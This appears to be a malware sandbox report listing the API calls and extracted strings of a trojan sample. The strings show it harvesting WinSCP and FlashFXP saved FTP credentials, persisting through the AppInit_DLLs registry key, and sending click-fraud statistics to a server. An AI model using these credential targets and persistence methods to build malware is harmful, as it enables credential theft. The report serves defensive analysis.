                          • Instruction ID: d928ca8cdb490927e602bcc25cbe761e1e9ca2c88fd961b6a2cac4e28df6e2a2
                          • Instruction Fuzzy Hash: CF717DB2900118ABCB20EB95CD45EEFBBBDEF48314F10457BF615F2181EA349A458B69
                          APIs
                          • HeapAlloc.KERNEL32(00000008,00000C20,?,00000000,00000008), ref: 00404542
                          • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 004045DA
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00404605
                          • RegCloseKey.ADVAPI32(?), ref: 0040476D
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocCloseEnumHeapOpen
                          • String ID: SOFTWARE\martin prikryl\winscp 2\sessions$ftp://%s:%s@%s:%u$hostname$password$portnumber$username
                          • API String ID: 3497950970-285550827
                          • Opcode ID: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction ID: 619369561540f7679ee4dce6ffb5b1aea82e2176e3673c83278f81db5409ea06
                          • Opcode Fuzzy Hash: 83023a017879fb9d364fb3a00f065a4bae95062c392e5dad8cefd1387496df25
                          • Instruction Fuzzy Hash: AE715DB2900119AFDB10DBD5CD81AEF77BCEB48308F10447AE605F3291EB389E458B68
                          APIs
                          • CharLowerW.USER32(?,?,?,?,?,?,+@,004089CD,?,?,?), ref: 0040933E
                          • SysFreeString.OLEAUT32(?), ref: 00409359
                          • SysFreeString.OLEAUT32(?), ref: 00409362
                          • SysAllocString.OLEAUT32(?), ref: 004093B8
                          • SysAllocString.OLEAUT32(javascript), ref: 004093C1
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E3
                          • SysFreeString.OLEAUT32(00000000), ref: 004093E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$Free$Alloc$CharLower
                          • String ID: http:$javascript$+@
                          • API String ID: 1987340527-3375436608
                          • Opcode ID: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction ID: 0b4048b57b081e67726dd44363989906ad2532c65c6ed0c60c908aefe346602b
                          • Opcode Fuzzy Hash: 713b06055eefad9f5422e5b9f5fb5af6d58bbbe1ec79e9ea68907389bd6c3b4b
                          • Instruction Fuzzy Hash: 6A310A71A00119AFDB04DFA6C889EAEB7B8EF48314B144469E805EB291D775AD41CF64
                          APIs
                          • DeleteFileW.KERNEL32(00000000,771B0F00), ref: 00407043
                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000004,00000080,00000000), ref: 0040705D
                          • GetLastError.KERNEL32(00000000), ref: 00407079
                          • SetEndOfFile.KERNEL32(00000000), ref: 0040708F
                          • InternetOpenUrlW.WININET(00000000,00000001,00000000,80000000,00000000,00000000), ref: 004070A9
                          • CloseHandle.KERNEL32(00000000), ref: 004070BB
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCreateDeleteErrorHandleInternetLastOpen
                          • String ID:
                          • API String ID: 3711279109-0
                          • Opcode ID: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction ID: 9d8a11a16b3c0a9aa44c9dcc38c8aa686dfb91ece0f3f59227d733df7bad94bb
                          • Opcode Fuzzy Hash: 89bc675b35fb8e2eee68dc50edc98837eed05b9f43fe5ca330cba4f7d07cf5ae
                          • Instruction Fuzzy Hash: 48313471800119EFEB119FA1DE85AEE7BBDFB04344F104872F652B61A0D731AE21DB66
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep
                          • String ID: .html$CsM$From: $Via: $^key=$ftp$hOA
                          • API String ID: 3472027048-2333287219
                          • Opcode ID: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction ID: 3376cbd9a830c5581772f61034da1910d267ee329a165acd0f4726bddbbbde03
                          • Opcode Fuzzy Hash: 74b6ecad85d8563e453e52ab39e53749c12d05251352443c8ee161ef9de2affd
                          • Instruction Fuzzy Hash: 4E419431A0091887CB24E7A29D529EF73A9EF40318F54407FE905B71D1EA7C9E898F5D
                          APIs
                          • VariantClear.OLEAUT32(00000016), ref: 00408E7A
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: _self$http$+@
                          • API String ID: 1473721057-3317424838
                          • Opcode ID: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction ID: ae9540e34d1dd6ebd4224328a85202065bb39baa52f6123ff81f2465f468f74f
                          • Opcode Fuzzy Hash: 318762bed40dfdc809c59a68404d151adbfac834f26e4a68fdc08c116542e79f
                          • Instruction Fuzzy Hash: 6C913D75A00209EFDB00DFA5C988DAEB7B9FF88305B144569E845FB290DB359D41CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00420840,?,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182), ref: 00406B2A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,?,004032CE,00420840,?,00000000,?,?,0040B182,?,0040B320,00000000), ref: 00406B8C
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000), ref: 00406C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open$CloseQueryValue
                          • String ID: CLSID$SOFTWARE\Classes\MIME\Database\Content Type\$application/x-javascript$text/html$text/javascript
                          • API String ID: 3546245721-1332223170
                          • Opcode ID: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction ID: b356448af2dda310db5a41c348b39e69e2b2ee30590ea213815e442ef4722270
                          • Opcode Fuzzy Hash: a4b16fbb25d38b57ee4efe956d64624d2281db9512bb134eed98189875e02577
                          • Instruction Fuzzy Hash: 0A4142B2650118AAEB10D6519E81BEB73FCEB44309F1144BBE705F2080FB789F598F69
                          APIs
                          • SysAllocString.OLEAUT32(eventConn), ref: 0040A18D
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0040A1D4
                          • SetParent.USER32(00000000,00000000), ref: 0040A1E2
                          • GetWindowLongW.USER32(00000000,000000EC), ref: 0040A1ED
                          • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0040A1FE
                          • SetWindowPos.USER32(00000000,00000001,00001388,00001388,00000010,?,00000000), ref: 0040A21E
                            • Part of subcall function 0040A0B5: CoInitialize.OLE32(00000000), ref: 0040A0C0
                            • Part of subcall function 0040A0B5: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                            • Part of subcall function 0040A0B5: CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Window$Long$AllocCreateFindHandleInitializeModuleParentString
                          • String ID: Shell_TrayWnd$eventConn
                          • API String ID: 2141107913-3455059086
                          • Opcode ID: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction ID: 39c15930e577ecb7297998fc23ff8408fdcdb7101606cb16b0d9d8475b405f16
                          • Opcode Fuzzy Hash: 2066f8b397b36b8e779d0438fd1e5f75721f75fac11e843927efdeb34d7bad55
                          • Instruction Fuzzy Hash: 05216834900214EFDB10AFA4CD89FAB7BB9EF0A311F2046B5F901EA2A1C7755D54CB96
                          APIs
                            • Part of subcall function 0040821C: PathCombineW.SHLWAPI(?,?,0040EC40,00408268,?,00000000,?,00000000,00000000), ref: 0040823C
                          • HeapAlloc.KERNEL32(00000008,00000626), ref: 00404888
                          • StrStrIA.SHLWAPI(?,?), ref: 00404913
                          • StrStrIA.SHLWAPI(?,?), ref: 00404925
                          • StrStrIA.SHLWAPI(?,?), ref: 00404935
                          • StrStrIA.SHLWAPI(?,?), ref: 00404947
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$AllocCloseCombineFirstHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: ftp://%S:%S@%S:%u$ftplist.txt
                          • API String ID: 1635188419-1322549247
                          • Opcode ID: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction ID: 36c1d9bdffb8f00438c4566312b7f03f9c346fdcff82922ab75e5f9c351e1c12
                          • Opcode Fuzzy Hash: a8df2d7964cb9d5e44167d75c5d9d1604856ea1b31e7d0b3f7357b398df4251d
                          • Instruction Fuzzy Hash: 3581B0B15043819FD721EF29C840A6BBBE5AFC9304F14497EFA84A32D1E738D945CB5A
                          APIs
                          • CreateWaitableTimerW.KERNEL32(00000000,00000001,00000000), ref: 00407374
                          • GetLocalTime.KERNEL32(?), ref: 00407387
                          • GetLocalTime.KERNEL32(?), ref: 0040738D
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004073C2
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407412
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040741C
                          • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00989680,00000000), ref: 0040747A
                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,00989680,00000000), ref: 00407485
                          • CloseHandle.KERNEL32(?,?,?,00989680,00000000), ref: 0040748E
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 2667820b8e72ac86daf0972410128220eb63d60d64ca4213cefa209fb62143e0
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID:
                          • String ID: http$+@
                          • API String ID: 0-4127549746
                          • Opcode ID: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction ID: 8803294073e7eabf7739078d3f203694aecc40311bc63510a67c123621be67c8
                          • Opcode Fuzzy Hash: f0dce942b3145dcad46720e365100d861664f6bcad1e9537a21da11c1cc3beb0
                          • Instruction Fuzzy Hash: 5CA17DB1A00519DFDF00DFA5C984AAEB7B5FF89305B14486AE845FB290DB34AD41CFA4
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                          • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                          • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                          • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          • Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                          • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                          • Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                          • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                          APIs
                          • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                          • __FindPESection.LIBCMT ref: 0040D8AC
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindHandlersScopeSectionTableValidate
                          • String ID:
                          • API String ID: 876702719-0
                          • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                          • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                          • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                          APIs
                          • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                          • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                          • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • _memset.LIBCMT ref: 004025DA
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                          • String ID: none
                          • API String ID: 2353737338-2140143823
                          • Opcode ID: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                          • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                          • Opcode Fuzzy Hash: c6b2da4a895c5a3c06ad821b8c76fb1796c02a28dfb90d6d9730734cddc33c41
                          • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                          • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                          • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                          • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                          • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          • 0, xrefs: 0040AA5B
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          • Opcode ID: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                          • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                          • Opcode Fuzzy Hash: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                          • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 00000007.00000002.1840216745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
